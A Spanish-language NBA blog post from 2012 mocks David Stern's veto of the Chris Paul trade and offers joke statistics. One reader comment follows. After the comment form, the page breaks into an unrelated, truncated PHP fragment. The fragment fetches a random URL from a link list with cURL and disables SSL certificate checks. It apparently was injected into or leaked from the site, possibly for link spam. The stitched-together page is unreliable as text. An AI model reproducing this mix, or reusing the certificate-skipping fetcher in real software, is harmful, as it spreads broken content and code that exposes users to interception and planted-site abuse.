Reflexiones sobre la bocina #8

04 de January de 2012 por MagicJohnson32

(Parafraseando a Ford Farlaine) Tantas cosas que decir sobre David Stern y tan pocos insultos en el diccionario.

Lo acontecido durante los días anteriores al arranque de la temporada NBA 2011-2012 parece algo difícil de entender y, ante todo, imposible de justificar. Nos referimos, por supuesto, a los sucesivos vetos al traspaso de Chris Paul a Lakers y Clippers, equipo que acabó haciéndose con los servicios de CP3 tras ceder a las exigencias de la liga. “Basketball reasons”, alegó Stern en su momento como motivo para tumbar el acuerdo inicial, aquel que habían alcanzado Hornets, Lakers y Rockets. Así puso el señor comisionado un broche muy adecuado a unos meses negros para su credibilidad y para la imagen de la NBA, con el lockout convertido en pseudo negociación del nuevo convenio colectivo.

- “Y yo, David Stern, por el poder que me ha sido concedido…¡¡VETO ESTE TRADE!!”

Tratemos de dejar de lado el ridículo de la liga y los propietarios, regateando a los jugadores para tratar de compensar los errores propios. Obviemos el que Stern sea el único comisionado en la historia de la NBA que haya visto partidos suspendidos por su incapacidad para cerrar un acuerdo a tiempo (en concreto, 704 partidos se fueron al limbo a causa de los dos últimos lockouts). Las Reflexiones sobre la bocina regresan para poner su atención en los vetos. ¿Debemos estar de acuerdo con ellos? No. ¿Por qué? Porque Stern, amigos míos, se ha quedado corto.

Stern: por una liga sin tocomochos

Hagamos un pequeño esfuerzo y entendamos la voluntad, sin duda justa y sana, que habita en las decisiones de Stern, aquello que él definió como “basketball reasons”. ¿Qué mejor principio podría regir la liga que éste? ¿Qué otra cosa podríamos pedir nosotros, como espectadores, que una NBA cuya brújula tenga como norte el bien del baloncesto? David Stern ha superado su responsabilidad de comisionado y se ha revelado así como un aténtico cruzado, garante único de una liga justa.

McIlvaine no era un jugador. Era una manera de entender la vida.

Sin embargo, insisto, se ha quedado corto. El veto al traspaso de Chris Paul es un primer paso, pero le queda mucho trabajo por hacer. De lo contrario ¿qué será de los Hawks, que en un momento de debilidad y por motivos que todavía no alcanzamos a comprender decidieron darle 120 millones de dólares a Joe Johnson? Vetemos aquel contrato, así como todos los que firmaron Eddy Curry, Darius Miles, Michael Olowokandi, Devean George, Kwame Brown y Jim McIlvaine a lo largo de sus carreras. Vetemos todos los fichajes de Isaiah Thomas durante su etapa como GM de los Knicks y todas las decisiones de John Kuester como entrenador de los Pistons.

Vetemos, por el amor de dios, el intercambio que llevó a Kobe Bryant a Los Angeles a cambio de Vlade Divac y, especialmente, el que hizo que Nowitzki fuese a los Mavs por Robert Tractor Traylor. Y, faltaría más, vetemos el traspaso de Pau Gasol a los Lakers y el de Kevin Garnett a los Celtics, atracos como los que no se veían desde los tiempos de Butch Cassidy y The Sundance Kid.

Y esto es sólo el principio. He aquí una muestra rápida y ejemplificadora del trabajo que David Stern tiene por delante: draft de 1984 ¿Que los Blazers eligieron a Sam Bowie en lugar de a Jordan? Veto. ¿Que los Mavs prefieron a Perkins sobre Barkley? Veto. Y así, hasta obtener una NBA verdaderamente justa.

De lo contrario nos veríamos obligados a aceptar que las decisiones de los GM se mueven en un plano diferente al de la “justicia” y que la NBA debería respetarlas mientras se produzcan en el marco de la normativa vigente. Pero nadie quiere eso ¿verdad?

Nuevo servicio EA SPORT

En esta edición de las Reflexiones sobre la bocina presentamos el servicio EA SPORT (Estadísticas Absurdas Sólo POr Reírnos Todos), a cargo del departamento de documentación y estadística de TJNBA (es decir, el google y yo). Periódicamente ofreceremos una compilación de hechos escasamente contratados -cuando no directamente inventados- pero que, cual telefilm dominical, están inspirados en hechos reales.

- "Los espíritus me dicen que nuestro próximo ataque acabará... con otro triple"

Nuestra ración inaugural de EA SPORT ha detectado que tras 10 días de competición…:

– …Dwyane Wade y LeBron James han intentando 1 solo triple cada uno. Estamos ante dos casos claros del “Síndrome de Josh Smith”, según el cual cuantos menos triples lancen, mejor juegan y, ante todo, mejor les va a sus equipos.

– …Lamar Odom no ha tomado una sola buena decisión. No tardará en empezar a rendir, seguro, pero por el momento sus actuaciones son una ristra de malos pases y tiros forzados. Tal vez sería la oportunidad perfecta para que un equipo necesitado de un sexto hombre polivalente hiciese una oferta a la baja a los Mavs. Los Lakers, por ejemplo.

– …los Knicks y los Magic son los únicos equipos que han lanzado más de 20 triples en todos y cada uno de los partidos disputados. El caso de Orlando, con una referencia interior como Dwight Howard y especialistas como Richardson, Anderson, Reddick o Turkoglu, tiene un pase. Pero los Knicks, que cuentan con una pareja interior del nivel de la que componen Chandler y Stoudemire, juegan como los Warriors de Nelson. ¿O tal vez deberíamos decir que juegan como los Suns de D’Antoni pero sin Nash?

Por último, los ganadores del premio EA, otorgado por criterios estrictamente estadísticos, son:

Brian Cardinal, en la categoría de “Más triples lanzados sin un solo acierto”: 0 de 10.

Derrick Favors, en la categoría de “Más pérdidas de balón sin una sola asistencia”: 11 pérdidas, 0 asistencias.

DeMarcus Cousins, en la categoría de “Más peticiones de traspaso ridículas”: 1 petición de traspaso, 0 neuronas.

Comenta

51 comentarios a esta entrada

  1. RSB dice:
    #1

    Hombre lo de Paul… Perder a Pau y a Odom no sé si te salía a cuenta, por mucho que los bases de LA sean de nivel paupérrimo. Ese traspaso solo tenía sentido para LA si conseguían también a Howard (y a Okafor), de lo contrario se cargaban el equilibrio de la plantilla y perdían su poderío en la pintura.

    Una cosa es la selección y otra cosa la NBA. Yo a Bryant lo considero el jugador más determinante de la liga en el uno contra uno, aunque ya no esté para aguantar la comparación con monstruos como Durant o Lebron, pero cada día me parece un jugador más egoísta, que cuanto más consigue más quiere, y que obvia a sus compañeros.

    No sé qué cara pondría cuando en un final de último cuarto Paul se jugará las dos canastas decivisivas (sobre todo si falla alguna), o cuando no pudiera botar él el balón el 95% de las veces iniciando la jugada… No los veo muy compatibles la verdad.

    PD: Melo es un jugador que no cae bien (a mí por lo menos), pero es un top 10 descarado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>